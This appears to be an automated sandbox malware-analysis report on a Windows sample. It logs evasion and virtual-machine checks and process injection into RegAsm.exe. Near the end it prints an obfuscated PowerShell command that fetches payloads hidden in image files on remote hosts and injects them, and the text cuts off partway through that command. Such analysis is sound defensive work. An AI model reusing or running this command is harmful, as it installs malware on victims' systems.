        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2880000 memory reserve | memory write watchJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2A30000 memory reserve | memory write watchJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 4A30000 memory reserve | memory write watchJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1424Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1398Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4595Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5181Jump to behavior
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-2345
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3412Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3192Thread sleep count: 4595 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3192Thread sleep count: 5181 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5836Thread sleep time: -14757395258967632s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1864Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 6544Thread sleep time: -30000s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeCode function: 0_2_00007FF6975A204C FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00007FF6975A204C
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeCode function: 0_2_00007FF6975A64E4 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,0_2_00007FF6975A64E4
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: powershell.exe, 00000008.00000002.2340710949.000001943F2B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tEventVmNetworkAdapter',
        Source: powershell.exe, 00000008.00000002.2340710949.000001943F2B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Remove-NetEventVmNetworkAdapter',
        Source: powershell.exe, 00000008.00000002.2340710949.000001943DEED000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: QEMU Virtual CPU
        Source: powershell.exe, 00000008.00000002.2340710949.000001943F2B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
        Source: powershell.exe, 00000008.00000002.2340710949.000001943F2B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapterX
        Source: powershell.exe, 00000008.00000002.2340710949.000001943E12B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
        Source: powershell.exe, 00000008.00000002.2340710949.000001943E12B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
        Source: powershell.exe, 00000008.00000002.2340710949.000001943F2B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapterX
        Source: powershell.exe, 00000008.00000002.2340710949.000001943F2B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
        Source: powershell.exe, 00000008.00000002.2340710949.000001943F2B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapterX
        Source: svchost.exe, 0000000A.00000002.3436789270.0000025084858000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.3437375112.00000250FF22B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: powershell.exe, 00000008.00000002.2340710949.000001943F2B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
        Source: powershell.exe, 00000008.00000002.2340710949.000001943F2B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Add-NetEventVmNetworkAdapter',
        Source: powershell.exe, 00000008.00000002.2340710949.000001943F2B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Get-NetEventVmNetworkAdapter',
        Source: powershell.exe, 00000008.00000002.2340710949.000001943E12B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
        Source: powershell.exe, 00000008.00000002.2340710949.000001943F2B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeCode function: 0_2_00007FF6975A1D28 memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,LocalAlloc,GetModuleFileNameA,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,0_2_00007FF6975A1D28
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeCode function: 0_2_00007FF6975A8790 SetUnhandledExceptionFilter,0_2_00007FF6975A8790
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeCode function: 0_2_00007FF6975A8494 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF6975A8494
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: page read and write | page guardJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Yara detected Powershell download and execute
        Source: Yara matchFile source: amsi64_5664.amsi.csv, type: OTHER
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1776, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5664, type: MEMORYSTR
        .NET source code references suspicious native API functions
        Source: 8.2.powershell.exe.1944a15c978.1.raw.unpack, Program.csReference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi)))
        Source: 8.2.powershell.exe.1944a15c978.1.raw.unpack, Program.csReference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi)))
        Source: 8.2.powershell.exe.1944a15c978.1.raw.unpack, Program.csReference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num4 + 8, ref buffer, 4, ref bytesRead)
        Source: 8.2.powershell.exe.1944a15c978.1.raw.unpack, Program.csReference to suspicious API methods: VirtualAllocEx(processInformation.ProcessHandle, num3, length, 12288, 64)
        Source: 8.2.powershell.exe.1944a15c978.1.raw.unpack, Program.csReference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num5, payload, bufferSize, ref bytesRead)
        Injects a PE file into a foreign processes
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
        Writes to foreign memory regions
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 442000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 472000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 8E4008Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\123.vbs" Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gc#Z#Bm#GY#ZgBm#GY#ZgBm#GY#LwBk#GQ#Z#Bk#GQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#Gk#bQBn#F8#d#Bl#HM#d##u#Go#c#Bn#D8#MQ#x#Dg#MQ#x#Dc#Mw#1#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#HI#YQB3#C4#ZwBp#HQ#a#B1#GI#dQBz#GU#cgBj#G8#bgB0#GU#bgB0#C4#YwBv#G0#LwBz#GE#bgB0#G8#bQBh#Gw#bw#v#GE#dQBk#Gk#d##v#G0#YQBp#G4#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#N##0#DQ#MQ#3#DI#Mw#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#I##9#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I##k#Gw#aQBu#Gs#cw#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#Gk#Zg#g#Cg#J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##LQBu#GU#I##k#G4#dQBs#Gw#KQ#g#Hs#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#C##J#Bl#G4#Z#BG#Gw#YQBn#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#KQ#7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#ZQBu#GQ#SQBu#GQ#ZQB4#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bl#G4#Z#BG#Gw#YQBn#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#ZwB0#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ck#I#B7#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#C##Kw#9#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#u#Ew#ZQBu#Gc#d#Bo#Ds#